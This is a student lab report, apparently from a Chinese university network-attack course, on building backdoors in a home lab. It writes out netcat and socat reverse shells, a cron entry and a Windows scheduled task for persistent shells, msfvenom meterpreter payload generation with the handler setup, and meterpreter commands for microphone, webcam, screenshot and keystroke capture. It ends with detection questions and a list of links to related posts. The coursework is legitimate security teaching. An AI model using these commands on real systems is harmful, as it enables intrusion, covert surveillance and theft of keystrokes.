2018-2019-2 20165225『网络对抗技术』Exp2:后门原理与实践


  • 一、实验说明

  • 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)

  • 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)

  • 任务三:使用MSF:meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

  • 任务四:使用MSF:meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分))

  • 实验准备

  • windows环境下下载老师提供的ncat和socat。

  • 使用ipconfig(windows下)和ipconfig(kali下)查询主机与虚拟机的IP地址(因为我没有2台电脑)

  • 知道了双方ip后,接下来就是使用ncat和socat这两个工具了,我们先用主机使用ncat.exe程序监听本机的5225端口:

  • 接着在Kali环境下,使用nc指令反向连接Windows主机的5225端口:

  • 发现成功获得kali的shell

  • 那么反过来呢,如何用kali获得主机的shell:

  • 我们先在kali下使用nc指令监听5225端口

  • 接着在主机下使用ncat.exe程序的-e选项项反向连接Kali主机的5225端口::

  • 结果也成功了

  • 我们如何使用nc传输数据呢?

  • windows下使用ncat.exe -l 5225监听5225端口

  • linux下使用ncat 192.168.6.1 5225链接(主机ip)

  • 很简单的就成功了

  • 体验 MSF Meterpreter 功能

  • 同样的,我们首先现在主机使用ncat.exe -l -p 5225启动监听5225端口

  • 然后用crontab -e指令编辑一条定时任务,在最后一行添加13 * * * * /bin/netcat 192.168.6.1 5225 -e /bin/sh,意思是在每个小时的第13分钟反向连接Windows主机的5225端口。

  • 可见13分后,主机获得了kali的shell

  • 同样的,反过来呢,让主机定时被kali获得shell:

  • 首先,我们在任务计划程序创建任务,填写任务名称,并新建一个触发器。

  • 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5225 exec:cmd.exe,pty,stderr

  • 我们使用windows + L键重新进入电脑,发现任务进程中已有我们创好的触发器:

  • 此时,在Kali环境下输入指令socat - tcp:192.168.6.1:5225,13分时我们可以发现kali已可成功获得了一个cmd shell:

  • 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.128 LPORT=5225 -f exe > 25test.exe生成后门程序

  • 通过nc指令将生成的后门程序传送到Windows主机上

  • 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

msfconsole下依次输入:

use exploit/multi/handler            
set payload windows/meterpreter/reverse_tcp  
show options                  
set LHOST 192.168.6.128            
set LPORT 5225                  
show options                  
exploit                       
  • 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

  • 使用record_mic指令可以截获一段音频:

  • 使用webcam_snap指令可以使用摄像头进行拍照:

  • 使用screenshot指令可以进行截屏:

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

  • 实验中遇到的问题及思考

  • 问题:如图,计算机积极拒绝链接,一开始以为是防火墙的问题或者是ssh未打开,上网查了好多方法都没有用

  • 解决方案:我打错了..少了端口号,加上就好了

  • 实验总结及体会

  • 本次实验我们简单了解和学习了一些后门工具的使用和如何通过他们来获得受害主机各种各样的权限;此次实验虽然内容简单,但我们对后门的基本原理了解却十分清晰,而且这次实验趣味性很强。

  • 二、基础问题回答

  • 问:例举你能想到的一个后门进入到你系统中的可能方式?

  • 网上下载软件时、收邮件时、使用来历不明的u盘或者光盘时

  • 问:例举你知道的后门如何启动起来(win及linux)的方式?

  • 修改注册表、设置为开机自启动、诱导用户点击或者光标划过、可以设为定时启动、启动绑定软件时启动

  • 问:Meterpreter有哪些给你映像深刻的功能?

  • 它获取权限之后简直可以完全执行受害主机的所有功能..

  • 问:如何发现自己有系统有没有被安装后门?

  • 可以检测网络连接,查看是否有IP与本机建立连接;安装专门的杀毒软件查看,看注册表有没有多出奇怪的东西;看任务运行列表是否有奇怪的任务

2018-2019-2 20165225『网络对抗技术』Exp2:后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 <网络对抗技术>Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0. ...

  3. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  4. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  5. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  6. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  7. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  8. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  9. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

随机推荐

  1. find xargs 简单组合使用

    简单总结下,留作自己以后拾遗...... 一.find xargs 简单组合 ## mv 小结find ./ -type f -name "*.sh"|xargs mv -t /o ...

  2. Linux 之 rsyslog+mysql+LogAnalyzer 日志收集系统

     作者:邓聪聪 LogAnalyzer 是一个 syslog 和其他网络事件数据的 Web 前端工具,提供简单易用的日志浏览.搜索和基本分析以及图表显示 由于公司部分项目需求使用日志记录系统,随笔记录 ...

  3. Revit二次开发之获得项目族预览图

    using Autodesk.Revit.UI; using Autodesk.Revit.DB; using Autodesk.Revit.Attributes; using System.Wind ...

  4. div的onclick事件怎么失效了?

    1 前言 div是用拼接复制到另一个个div上,div的onclick事件中方法名为close,导致onclick=“close()” 触发不了,然后换了名称就可以了 2 代码 <!DOCTYP ...

  5. python基础之常用关键字总结

    前言 到python3.6为止,python内置的关键字有33个,比python2.7的版本多了2个.下面总结一下python3的关键字的使用. python内置关键字 解释器在加载上下文的时候,如果 ...

  6. 主席树入门——询问区间第k大pos2104,询问区间<=k的元素个数hdu4417

    poj2104找了个板子..,但是各种IO还可以进行优化 /* 找区间[l,r]第k大的数 */ #include<iostream> #include<cstring> #i ...

  7. zt 正则

    http://deerchao.net/tutorials/regex/regex.htm     正则表达式30分钟入门教程 版本:v2.3.5 (2017-6-12) 作者:deerchao 转载 ...

  8. python实现简单的登录管理

    import json,timeusername=[]userpasswd=[]def login_success_file(name): try: f=open(r"F:/login_su ...

  9. [BZOJ4913][SDOI2017]遗忘的集合

    题解: 首先先弄出$f(x)$的生成函数$$f(x)=\prod_{i=1}^{n} {{(\frac{1}{1-x^i})}}^{a[i]}$$因为$f(x)$已知,我们考虑利用这个式子取推出$a[ ...

  10. Barber paradox

    According to Wikipedia, the well known barber paradox states like this: The barber is the "one ...